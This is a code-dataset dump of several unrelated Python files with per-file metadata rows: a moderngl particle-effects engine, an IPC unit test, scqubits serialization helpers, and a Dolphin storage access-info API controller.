self.prog_emit["Rotation_velocity"] = float(self.system.r(self, "rot_vel"))
self.prog_emit["Rotation_velocity_sway"] = float(
self.system.r(self, "rot_vel_range")
)
self.prog_emit["Life"] = float(self.system.r(self, "life"))
self.prog_emit["Life_sway"] = float(self.system.r(self, "life_range"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def load_programs(self):
self.prog_emit = self.game.m_res.get_program_varyings(
"p4_emit_ver", varyings=self.game.m_par.get_varyings(),
)
def load_context_objects(self):
self.vao_emit = self.game.ctx._vertex_array(self.prog_emit, [])
def render(self, time, frame_time):
self.set_fields()
emit_count = 0
self.counters += frame_time
# self.active_particles = 0
if self.delay < self.counters < self.delay + self.duration:
self.emit_want += self.emit_count * frame_time
emit_count = int(min(self.N - self.system.particles, self.emit_want))
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.prog_emit["time"].value = max(time, 0) + random() / 50
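            # transform feedback: run the emit shader for emit_count dummy
            # vertices, appending new particle records after the live ones in
            # vbo2 (buffer_offset is in bytes: particle count * stride)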
with self.game.query:
self.vao_emit.transform(
self.system.vbo2,
vertices=emit_count,
buffer_offset=self.system.particles * self.game.m_par.stride,
)
# print(self.system.particles, emit_count, self.game.query.primitives)
self.system.particles += self.game.query.primitives
# print(self.system.particles)
# print(
# f"Emitting on {self.counters} for {frame_time}, {emit_count} particles {self.active_particles}."
        # )
class Renderer:
def __init__(self, game, system, params, stage):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.stage = stage
self.title = "Renderer"
eqname = self.system.r(self, "equation").strip().lower()
self.equation = 1 if eqname == "solid" else 3 if eqname == "anti" else 2
# TODO: temp
self.texture = self.game.m_res.get_texture(
"particle", self.system.r(self, "file")
)
self.load_programs()
self.load_context_objects()
self.set_fields()
self.step_quantity = self.game.m_par.step_quantity
# TODO TEMP
self.texture_noise = self.game.m_res.get_noise()
self.prog["Size"].value = 1.0
self.prog["Stage"] = stage
self.prog["Basis"] = self.system.basis
self.vao_receive_dict = {}
self.buffer_requests = []
self.current_active_buffer = 1
self.prog["texture0"] = 0
self.prog["texturearray1"] = 10
self.prog["Usenoise"] = self.equation != 1
self.rotvel = bool(self.system.r(self, "rotvel"))
self.noise_speed = 0
self.noise_id = 0
def set_fields(self):
self.opacity = float(self.system.r(self, "opacity"))
self.noise_speed = float(self.system.r(self, "noise"))
def load_programs(self):
# Renders particle to the screen
self.prog = self.game.m_res.get_program("p4_render")
def load_context_objects(self):
        # Render VAOs: the render-to-screen counterparts of the transform VAOs above
self.vao1_rend = self.game.ctx.vertex_array(
self.prog, [self.game.m_par.vao_def(self.system.vbo1, render=True)],
)
self.vao2_rend = self.game.ctx.vertex_array(
self.prog, [self.game.m_par.vao_def(self.system.vbo2, render=True)],
)
def render(self, time, frame_time):
self.set_fields()
self.prog["CameraPosition"] = self.game.m_cam.pos
self.noise_id = (
time * self.step_quantity * 2 * self.noise_speed
) % 5680 # 710 * 8
self.prog["noise_id"] = self.noise_id // 8
self.prog["projection"].write(self.game.m_cam.mvp)
self.prog["BillboardFace"].write(
self.game.m_cam.bill_rot.astype("f4").tobytes()
)
self.emit_gpu(time, frame_time)
def switch_buffers(self):
self.vao1_rend, self.vao2_rend = self.vao2_rend, self.vao1_rend
def emit_gpu(self, time, frame_time):
self.prog["opacity"] = self.opacity
self.prog["Usenoise"] = (self.equation != 1) and (self.noise_speed != 0)
self.prog["Rotvel"] = self.rotvel
self.texture.use(0)
self.texture_noise.use(10)
self.vao1_rend.render(moderngl.POINTS, vertices=self.system.particles)
class Transformer:
def __init__(self, game, system):
self.game = game
self.system = system
self.geo_declarations = set(["\n"])
self.geo_code = ""
self.geo_target = {}
self.uniforms = set()
def add_geoblock(self, params, target_filter, stage_in, stage_out=None):
title = (
params["title"].strip().lower().replace(" ", "_")
if "filter" in params["title"].lower()
else params["title"][4:].strip().lower().replace(" ", "_")
)
block = self.game.m_res.get_geoblock(title)
self.params = params["content"]
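        # geoblock GLSL sources carry a "// CONSTANTS" section that lists
        # typed %NAME% placeholders; each is resolved from the node's
        # parameters and substituted into the shader code below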
constants = block.split("// CONSTANTS")[1].split("// CONSTANTS_END")[0].strip()
dict_block = {}
if stage_out is not None:
dict_block["%TARGET_STAGE%"] = str(stage_out)
for line in constants.split("\n"):
if line[:5] == "// --":
continue
perc_parts = line.split("%")
typ = perc_parts[0]
varn = perc_parts[1]
if typ in ("float", "int",):
dict_block[f"%{varn}%"] = str(self.r(varn))
if typ in ("bool",):
dict_block[f"%{varn}%"] = "true" if self.r(varn, t="b") else "false"
if typ == "vec3":
dict_block[
f"%{varn}%"
] = f"""vec3{str((str(self.r(f"{varn}_X")), str(self.r(f"{varn}_Y")), str(self.r(f"{varn}_Z")))).replace("'","")}"""
geo_declarations, geo_code = block.split("// DECLARATIONS_END")
if stage_in is not None:
geo_code = "\n".join([f"if(pos.a=={stage_in})", "{", geo_code, "}"])
geo_declarations = set(
[
f"{x.strip()};"
for x in geo_declarations.split("// DECLARATIONS")[-1].split(";")
if x.strip()
]
)
for k, v in dict_block.items():
geo_code = geo_code.replace(k, v)
self.geo_declarations = self.geo_declarations | geo_declarations
if stage_out is not None:
# is filter
if params["outputs"][0]["id"] in self.geo_target:
geo_code = geo_code.replace(
r"%GEOBLOCKS%", self.geo_target[params["outputs"][0]["id"]]
)
else:
geo_code = geo_code.replace(r"%GEOBLOCKS%", "")
# print(geo_code)
if target_filter is not None:
# print("I HAVE A FILTER")
self.geo_target[target_filter] = geo_code
else:
# print("I HAVE NO FILTER")
self.geo_code += geo_code
def r(self, query, t="f"):
# print("\n", query)
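        # values that reference equations via !name! cannot be baked into the
        # shader as constants, so each reference becomes a UNI_<name> uniform
        # and emit_gpu() re-evaluates and uploads it every frame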
unparsed = self.system.r(self, query, parse=False)
# print(query, unparsed)
if not isinstance(unparsed, bool) and "!" in unparsed:
for key in self.system.equations.keys():
if f"!{key}!" in unparsed:
unparsed = unparsed.replace(f"!{key}!", f"UNI_{key}")
self.uniforms.add(key)
# key = f"UNI_{len(self.uniforms)}"
# self.uniforms[key] = unparsed
return f"({unparsed})"
if t == "b":
result = self.system.r(self, query)
return bool(result)
return f"({unparsed})"
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def load_programs(self):
# print("\n".join(self.geo_declarations) + self.geo_code)
self.prog_trans = self.game.m_res.get_program_varyings(
"p4_transform_ver",
"p4_transform_geo",
geoblocks="\n".join(self.geo_declarations) + self.geo_code,
uniforms="\n".join(
[f"uniform float UNI_{x};" for x in self.system.equations.keys()]
),
varyings=self.game.m_par.get_varyings(),
)
def load_context_objects(self):
# Transform vaos. We transform data back and forth to avoid buffer copy
self.vao1_trans = self.game.ctx.vertex_array(
self.prog_trans, [self.game.m_par.vao_def(self.system.vbo1, render=False)],
)
self.vao2_trans = self.game.ctx.vertex_array(
self.prog_trans, [self.game.m_par.vao_def(self.system.vbo2, render=False)],
)
def render(self, time, frame_time):
self.emit_gpu(time, frame_time)
return
def switch_buffers(self):
# Swap around objects for next frame
self.vao1_trans, self.vao2_trans = (
self.vao2_trans,
self.vao1_trans,
)
def emit_gpu(self, time, frame_time):
for key in self.uniforms:
self.prog_trans[f"UNI_{key}"] = self.system.p(f"!{key}!")
self.prog_trans["StepSize"] = self.system.step_size
self.prog_trans["time"] = max(time, 0)
        # Transform all particles, recording how many elements the geometry shader emitted
with self.game.query:
self.vao1_trans.transform(
self.system.vbo2, moderngl.POINTS, vertices=self.system.particles
)
self.system.particles = self.game.query.primitives
class Trigger:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.title = "Trigger"
self.sound = str(self.system.r(self, "sound_path"))
self.game.r_aud.cache_effect(self.sound)
self.emit_want = 0
self.last_time = self.system.time_alive
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.emit_count = float(self.system.r(self, "count"))
self.delay = float(self.system.r(self, "delay"))
self.hit = float(self.system.r(self, "hit"))
self.hit_enabled = bool(self.system.r(self, "hit_enabled"))
self.sound_enabled = bool(self.system.r(self, "sound_enabled"))
self.shake = float(self.system.r(self, "shake"))
self.shake_enabled = bool(self.system.r(self, "shake_enabled"))
self.dark_enabled = bool(self.system.r(self, "dark_enabled"))
self.dark_recover = bool(self.system.r(self, "dark_recover"))
self.dark = float(self.system.r(self, "dark"))
self.dark_speed = float(self.system.r(self, "dark_speed"))
self.dark_speed_enabled = bool(self.system.r(self, "dark_speed_enabled"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
    def render(self, time, frame_time):  # frame_time unused; kept to match on_tick
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
self.emit_want += self.emit_count * (time - self.last_time)
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.game.r_aud.play_effect(self.sound)
if self.dark_enabled:
self.system.brender.set_dark(
self.dark,
self.dark_speed if self.dark_speed_enabled else None,
self.dark_recover,
)
if self.shake_enabled:
self.system.brender.battle_shake = self.shake
self.last_time = time
class Actor:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
        self.title = "Actor"
self.emit_want = 0
self.last_time = self.system.time_alive
self.fired = False
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.continuous = bool(self.system.r(self, "continuous"))
self.delay = float(self.system.r(self, "delay"))
self.user_enabled = bool(self.system.r(self, "user_enabled"))
self.user_recover = bool(self.system.r(self, "user_recover"))
self.user = (
float(self.system.r(self, "user_x")),
float(self.system.r(self, "user_y")),
float(self.system.r(self, "user_z")),
)
self.user_speed = float(self.system.r(self, "user_speed"))
self.user_speed_enabled = bool(self.system.r(self, "user_speed_enabled"))
self.target_enabled = bool(self.system.r(self, "target_enabled"))
self.target_recover = bool(self.system.r(self, "target_recover"))
self.target = (
float(self.system.r(self, "target_x")),
float(self.system.r(self, "target_y")),
float(self.system.r(self, "target_z")),
)
self.target_speed = float(self.system.r(self, "target_speed"))
self.target_speed_enabled = bool(self.system.r(self, "target_speed_enabled"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
    def render(self, time, frame_time):  # frame_time unused; kept to match on_tick
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
if self.continuous or not self.fired:
self.fired = True
if self.user_enabled:
self.system.brender.set_movement(
1 if self.system.target[0] == 0 else 0,
(
self.user[0] * self.system.basis[0],
self.user[1] * self.system.basis[1],
self.user[2] * self.system.basis[2],
),
self.user_speed if self.user_speed_enabled else None,
self.user_recover,
)
if self.target_enabled:
self.system.brender.set_movement(
0 if self.system.target[0] == 0 else 1,
(
self.target[0] * self.system.basis[0],
self.target[1] * self.system.basis[1],
self.target[2] * self.system.basis[2],
),
self.target_speed if self.target_speed_enabled else None,
self.target_recover,
)
self.last_time = time
class Camera:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.params = params["content"]
self.title = "Camera"
self.fired = False
self.emit_want = 0
self.last_time = self.system.time_alive
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.emit_count = float(self.system.r(self, "count"))
self.delay = float(self.system.r(self, "delay"))
self.mirror = str(self.system.r(self, "mirror"))
self.target = float(self.system.r(self, "target"))
self.speed = float(self.system.r(self, "speed"))
self.friction = float(self.system.r(self, "friction"))
self.target = (
(180 - self.target) % 360 if self.system.target[0] == 0 else self.target
)
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
    def render(self, time, frame_time):  # frame_time unused; kept to match on_tick
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
self.emit_want += self.emit_count * (time - self.last_time)
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.game.m_cam.go_to(self.target, self.speed)
class Camrail:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.params = params["content"]
self.title = "Camera"
        self.emit_want = 0
        self.counters = 0
self.alive = True
self.set_fields()
    def set_fields(self):
        self.mirror = str(self.system.r(self, "mirror"))
        self.delay = float(self.system.r(self, "delay"))
        # duration and count are read here too, mirroring Camera, since
        # render() below uses them (assumes the node defines both fields)
        self.duration = float(self.system.r(self, "duration"))
        self.emit_count = float(self.system.r(self, "count"))
        self.target = float(self.system.r(self, "target"))
        self.speed = float(self.system.r(self, "speed"))
        self.friction = float(self.system.r(self, "friction"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def render(self, time, frame_time):
self.set_fields()
emit_count = 0
self.counters += frame_time
# self.active_particles = 0
if self.delay < self.counters < self.delay + self.duration:
self.emit_want += self.emit_count * frame_time
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
| 35.661389 | 132 | 0.546622 | 3,660 | 29,278 | 4.21694 | 0.088525 | 0.086173 | 0.060581 | 0.08261 | 0.600492 | 0.51406 | 0.415576 | 0.341195 | 0.303356 | 0.287482 | 0 | 0.01079 | 0.319455 | 29,278 | 820 | 133 | 35.704878 | 0.763814 | 0.049559 | 0 | 0.3552 | 0 | 0.0048 | 0.07984 | 0.007995 | 0 | 0 | 0 | 0.00122 | 0 | 1 | 0.0832 | false | 0.0096 | 0.0048 | 0.0096 | 0.1296 | 0.0032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6723d1d3ec3bf091fc0f8a529233ad8594ca943 | 1,764 | py | Python | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | import unittest
from comm import IpcComm
from comm import IpcTransmitter
import json
class IpcCommTest(unittest.TestCase):
def setUp(self):
pass
def test_IpcCommTest_0011(self):
"""
        Test case No. 11
"""
        ### No.11-1 Constructor creation ###
try:
com_obj = IpcComm.IpcComm(None)
assert(True)
except:
self.fail()
        ### No.11-2 Normal message transmission ###
state = IpcComm.IpcState()
try:
assert( com_obj.Execute("hoge", 5, json.dumps({"test1": 3, "test2":"str"}), state) == 0)
except:
self.fail()
        ### No.11-3 Command is null ###
try:
assert( com_obj.Execute(None, 5, json.dumps({"test1": 3, "test2":"str"}), state) != 0)
except:
self.fail()
        ### No.11-4 Parameter is not valid JSON ###
try:
assert( com_obj.Execute("hoge", 5, "ABCDEFGHI", state) != 0)
except:
self.fail()
        ### No.11-5 Parameter is null ###
try:
assert( com_obj.Execute("hoge", 5, None, state) != 0)
except:
self.fail()
### No.11-6 seqNo<0 ###
try:
assert( com_obj.Execute("hoge", -5, json.dumps({"test1": 3, "test2":"str"}), state) != 0)
except:
self.fail()
        ### No.11-7 state is null ###
try:
assert( com_obj.Execute("hoge", -5, json.dumps({"test1": 3, "test2":"str"}), None) != 0)
except:
self.fail()
        ### No.11-8 parameter = "" (blank) ###
state = IpcComm.IpcState()
try:
assert( com_obj.Execute("hoge", 5, "", state) == 0)
except:
self.fail()
def tearDown(self):
pass
| 23.837838 | 101 | 0.475624 | 192 | 1,764 | 4.317708 | 0.286458 | 0.038601 | 0.135103 | 0.135103 | 0.595899 | 0.523522 | 0.500603 | 0.377563 | 0.377563 | 0.377563 | 0 | 0.050577 | 0.361111 | 1,764 | 73 | 102 | 24.164384 | 0.685004 | 0.105442 | 0 | 0.622222 | 0 | 0 | 0.056441 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 1 | 0.066667 | false | 0.044444 | 0.088889 | 0 | 0.177778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f672cd8f72a56c9f5ec0fdbb9ba4d18a17feb3e0 | 10,093 | py | Python | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 108 | 2019-12-14T16:08:04.000Z | 2022-03-21T03:48:33.000Z | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 62 | 2019-12-14T02:41:00.000Z | 2022-02-06T07:32:42.000Z | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 46 | 2019-12-21T12:13:11.000Z | 2022-03-31T17:09:53.000Z | # fileio_serializers.py
#
# This file is part of scqubits: a Python package for superconducting qubits,
# arXiv:2107.08552 (2021). https://arxiv.org/abs/2107.08552
#
# Copyright (c) 2019 and later, Jens Koch and Peter Groszkowski
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
"""
Helper classes for writing data to files.
"""
import inspect
from abc import ABC, ABCMeta
from collections import OrderedDict
from numbers import Number
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Tuple, Union
import numpy as np
from numpy import ndarray
from scipy.sparse import csc_matrix
import scqubits.utils.misc as utils
if TYPE_CHECKING:
from scqubits.io_utils.fileio import IOData
SERIALIZABLE_REGISTRY = {}
class Serializable(ABC):
"""Mix-in class that makes descendant classes serializable."""
_subclasses: List[ABCMeta] = []
def __new__(cls: Any, *args, **kwargs) -> "Serializable":
"""Modified `__new__` to set up `cls._init_params`. The latter is used to
record which of the `__init__` parameters are to be stored/read in file IO."""
cls._init_params = get_init_params(cls)
return super().__new__(cls)
def __init_subclass__(cls) -> None:
"""Used to register all non-abstract subclasses as a list in
`QuantumSystem.subclasses`."""
super().__init_subclass__()
if not inspect.isabstract(cls):
cls._subclasses.append(cls)
SERIALIZABLE_REGISTRY[cls.__name__] = cls
@classmethod
def deserialize(cls, io_data: "IOData") -> "Serializable":
"""
Take the given IOData and return an instance of the described class,
initialized with the data stored in io_data.
"""
return cls(**io_data.as_kwargs())
def serialize(self) -> "IOData":
"""
Convert the content of the current class instance into IOData format.
"""
initdata = {name: getattr(self, name) for name in self._init_params}
if hasattr(self, "_id_str"):
initdata["id_str"] = self._id_str # type:ignore
iodata = dict_serialize(initdata)
iodata.typename = type(self).__name__
return iodata
def filewrite(self, filename: str) -> None:
"""Convenience method bound to the class. Simply accesses the `write`
function."""
import scqubits.io_utils.fileio as io
io.write(self, filename)
@classmethod
def create_from_file(cls, filename: str) -> object:
"""Read initdata and spectral data from file, and use those to create a new
SpectrumData object.
Returns
-------
SpectrumData
new SpectrumData object, initialized with data read from file
"""
import scqubits.io_utils.fileio as io
return io.read(filename)
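
# Illustrative sketch of the mix-in in use; ``Oscillator`` and its parameters
# are invented for this example -- only the ``__init__`` signature matters,
# since it determines which attributes ``serialize`` records:
#
#     class Oscillator(Serializable):
#         def __init__(self, frequency: float, label: str = "osc"):
#             self.frequency = frequency
#             self.label = label
#
#     osc = Oscillator(5.2)
#     iodata = osc.serialize()                # IOData, typename "Oscillator"
#     copy = Oscillator.deserialize(iodata)   # equivalent new instance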
def _add_object(
name: str,
obj: object,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
objects[name] = obj
return attributes, ndarrays, objects
def _add_ndarray(
name: str,
obj: ndarray,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
ndarrays[name] = obj
return attributes, ndarrays, objects
def _add_attribute(
name: str,
obj: Any,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
attributes[name] = obj
return attributes, ndarrays, objects
TO_ATTRIBUTE = (str, Number, dict, list, tuple, bool, np.bool_)
TO_NDARRAY = (np.ndarray,)
TO_OBJECT = (Serializable,)
def type_dispatch(entity: Serializable) -> Callable:
"""
Based on the type of the object ``entity``, return the appropriate function that
converts the entity into the appropriate category of IOData
"""
if isinstance(entity, TO_ATTRIBUTE):
return _add_attribute
if isinstance(entity, TO_OBJECT):
return _add_object
if isinstance(entity, TO_NDARRAY):
if entity.dtype == "O":
return _add_object
return _add_ndarray
# no match, try treating as object, though this may fail
return _add_object
def dict_serialize(dict_instance: Dict[str, Any]) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
dict_instance = utils.remove_nones(dict_instance)
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "dict"
for name, content in dict_instance.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def OrderedDict_serialize(dict_instance: Dict[str, Any]) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
dict_instance = utils.remove_nones(dict_instance)
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "OrderedDict"
for name, content in dict_instance.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def csc_matrix_serialize(csc_matrix_instance: csc_matrix) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "csc_matrix"
csc_dict = {
"indices": csc_matrix_instance.indices,
"indptr": csc_matrix_instance.indptr,
"shape": csc_matrix_instance.shape,
"data": csc_matrix_instance.data,
}
for name, content in csc_dict.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def NoneType_serialize(none_instance: None) -> "IOData":
"""
Create an IOData instance to write `None` to file.
"""
import scqubits.io_utils.fileio as io
attributes = {"None": 0}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "NoneType"
return io.IOData(typename, attributes, ndarrays, objects)
def listlike_serialize(listlike_instance: Union[List, Tuple]) -> "IOData":
"""
Create an IOData instance from list data.
"""
import scqubits.io_utils.fileio as io
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = type(listlike_instance).__name__
for index, item in enumerate(listlike_instance):
update_func = type_dispatch(item)
attributes, ndarrays, objects = update_func(
str(index), item, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
list_serialize = listlike_serialize
tuple_serialize = listlike_serialize
ndarray_serialize = listlike_serialize # this is invoked for dtype=object
def range_serialize(range_instance: range) -> "IOData":
"""
Create an IOData instance from range data.
"""
import scqubits.io_utils.fileio as io
attributes = {
"start": range_instance.start,
"stop": range_instance.stop,
"step": range_instance.step,
}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = type(range_instance).__name__
return io.IOData(typename, attributes, ndarrays, objects)
def dict_deserialize(iodata: "IOData") -> Dict[str, Any]:
"""Turn IOData instance back into a dict"""
return dict(**iodata.as_kwargs())
def OrderedDict_deserialize(iodata: "IOData") -> Dict[str, Any]:
"""Turn IOData instance back into a dict"""
return OrderedDict([(name, values) for name, values in iodata.as_kwargs().items()])
def csc_matrix_deserialize(iodata: "IOData") -> csc_matrix:
"""Turn IOData instance back into a csc_matrix"""
csc_dict = dict(**iodata.as_kwargs())
return csc_matrix(
(csc_dict["data"], csc_dict["indices"], csc_dict["indptr"]),
shape=csc_dict["shape"],
)
def NoneType_deserialize(iodata: "IOData") -> None:
"""Turn IOData instance back into a csc_matrix"""
return None
def list_deserialize(iodata: "IOData") -> List[Any]:
"""Turn IOData instance back into a list"""
dict_data = iodata.as_kwargs()
return [dict_data[key] for key in sorted(dict_data, key=int)]
def tuple_deserialize(iodata: "IOData") -> Tuple:
"""Turn IOData instance back into a tuple"""
return tuple(list_deserialize(iodata))
# this is invoked for ndarrays with dtype=object
def ndarray_deserialize(iodata: "IOData") -> ndarray:
return np.asarray(list_deserialize(iodata), dtype=object)
def range_deserialize(iodata: "IOData") -> range:
arguments = iodata.as_kwargs()
return range(arguments["start"], arguments["stop"], arguments["step"])
def get_init_params(obj: Serializable) -> List[str]:
"""
Returns a list of the parameters entering the `__init__` method of the given
object `obj`.
"""
init_params = list(inspect.signature(obj.__init__).parameters.keys()) # type: ignore
if "self" in init_params:
init_params.remove("self")
if "kwargs" in init_params:
init_params.remove("kwargs")
# if "id_str" in init_params:
# init_params.remove("id_str")
return init_params
| 30.218563 | 89 | 0.661151 | 1,235 | 10,093 | 5.234008 | 0.176518 | 0.031405 | 0.065749 | 0.029239 | 0.384901 | 0.375155 | 0.342203 | 0.332766 | 0.280167 | 0.26547 | 0 | 0.003442 | 0.222729 | 10,093 | 333 | 90 | 30.309309 | 0.820523 | 0.211434 | 0 | 0.362162 | 0 | 0 | 0.034574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0 | 0.097297 | 0.005405 | 0.389189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6748a527fcca89db5882d6c5fe0f761006224a7 | 2,328 | py | Python | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from webob import exc
from dolphin import db
from dolphin import exception
from dolphin.api import validation
from dolphin.api.common import wsgi
from dolphin.api.schemas import access_info as schema_access_info
from dolphin.api.views import access_info as access_info_viewer
from dolphin.drivers import api as driverapi
class AccessInfoController(wsgi.Controller):
def __init__(self):
super(AccessInfoController, self).__init__()
self._view_builder = access_info_viewer.ViewBuilder()
self.driver_api = driverapi.API()
def show(self, req, id):
"""Show access information by storage id."""
ctxt = req.environ['dolphin.context']
try:
access_info = db.access_info_get(ctxt, id)
except exception.AccessInfoNotFound as e:
raise exc.HTTPNotFound(explanation=e.msg)
return self._view_builder.show(access_info)
@validation.schema(schema_access_info.update)
def update(self, req, id, body):
"""Update storage access information."""
ctxt = req.environ.get('dolphin.context')
try:
access_info = db.access_info_get(ctxt, id)
access_info.update(body)
access_info = self.driver_api.update_access_info(ctxt, access_info)
except (exception.InvalidCredential,
exception.InvalidResults,
exception.StorageDriverNotFound,
exception.AccessInfoNotFound,
exception.StorageNotFound,
exception.StorageSerialNumberMismatch) as e:
raise exc.HTTPBadRequest(explanation=e.msg)
return self._view_builder.show(access_info)
def create_resource():
return wsgi.Resource(AccessInfoController())
| 36.375 | 79 | 0.707904 | 290 | 2,328 | 5.544828 | 0.413793 | 0.099502 | 0.034826 | 0.019901 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0 | 0.004384 | 0.216065 | 2,328 | 63 | 80 | 36.952381 | 0.876712 | 0.270189 | 0 | 0.162162 | 0 | 0 | 0.0179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.216216 | 0.027027 | 0.432432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f674f950bc65f3ca25e588c8f6a8f3b548831ffe | 1,826 | py | Python | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
